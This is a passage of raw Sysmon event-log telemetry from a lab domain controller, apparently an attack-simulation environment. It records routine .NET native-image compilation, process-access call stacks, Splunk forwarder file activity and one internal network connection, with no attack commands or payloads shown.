21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.148{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.133{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A14F-60D3-DA02-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.133{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14F-60D3-DA02-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.008{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A14E-60D3-D902-00000000CF01}2328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.992{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A14E-60D3-D902-00000000CF01}2328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:06.992{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A14E-60D3-D902-00000000CF01}2328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.820{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A150-60D3-DF02-00000000CF01}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.804{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A150-60D3-DF02-00000000CF01}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.804{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A150-60D3-DF02-00000000CF01}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.758{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A150-60D3-DE02-00000000CF01}6504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.742{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A150-60D3-DE02-00000000CF01}6504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.742{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A150-60D3-DE02-00000000CF01}6504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.664{4DB9351A-A14F-60D3-DD02-00000000CF01}3336NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0RHD0SJX41\UIAutomationClientsideProviders.ni.dll.auxMD5=9D6D78861522C3FB97DA8B09C8E446DC,SHA256=08CD6AD8DC25313A6243C514AAD58762B3A6FFD3DC7A5299F96383D95CFE7B1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.664{4DB9351A-A14F-60D3-DD02-00000000CF01}3336NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0RHD0SJX41\UIAutomationClientsideProviders.ni.dllMD5=C97097D040E8D1C64BC37BC0729DD6E3,SHA256=591FD736BE66F8802BD9CD4C367EB8F39983175197E27A2FF3D0B4BDEDE78093,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.664{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28BE884362912AB2F7C164139615B484,SHA256=9030F54B2FEC42A949AF922ADC0E398FC47883D72902707C6ADD7D9704B2ECD6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:08.633{4DB9351A-A14F-60D3-DD02-00000000CF01}3336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d08-0\UIAutomationClientsideProviders.dll2021-06-23 21:02:08.633 23542300x800000000000000019482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:08.617{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=033154993108D32876F258D1534D5426,SHA256=F6E7341A4D8F8D045CDF934630527110465FB2F5C351CB6E3A83F683B74D177F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:07.202{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61380-false10.0.1.12-8000- 23542300x800000000000000019518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.961{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DA9B97B9A618FD7069DD9A693086781,SHA256=F4C0BC03258A31A4E6967D89770C55E4A3B83A9563141C62B25F44DFF3050E4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.945{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A151-60D3-E402-00000000CF01}5964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.929{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A151-60D3-E402-00000000CF01}5964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.929{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E402-00000000CF01}5964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.883{4DB9351A-A151-60D3-E302-00000000CF01}3016NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FYTR7IAGCX\WindowsFormsIntegration.ni.dll.auxMD5=C8A4279CFBE925C850CA4C4DD2C1C528,SHA256=7BF8A985A352C514A84D74B9F53A100657E22670D5DA00328E691D214E2611E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.883{4DB9351A-A151-60D3-E302-00000000CF01}3016NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FYTR7IAGCX\WindowsFormsIntegration.ni.dllMD5=399562C6D47FD0191F0FE8CB6D4634A0,SHA256=ED75707ABB2915A731074CE545C406BE91D120CFFECDA03DA4FC464739FB528C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:09.867{4DB9351A-A151-60D3-E302-00000000CF01}3016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bc8-0\WindowsFormsIntegration.dll2021-06-23 21:02:09.867 23542300x800000000000000019511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.680{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40CE2A514B06515415FE1A071106C652,SHA256=93E2001A6E1674CD7968351FB6B76F38D65371E8E69485D6E4275CD505F2DBA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.601{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A151-60D3-E302-00000000CF01}3016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.601{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A151-60D3-E302-00000000CF01}3016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.601{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A151-60D3-E302-00000000CF01}3016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.523{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A151-60D3-E202-00000000CF01}3740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:09.508{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A151-60D3-E202-00000000CF01}3740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 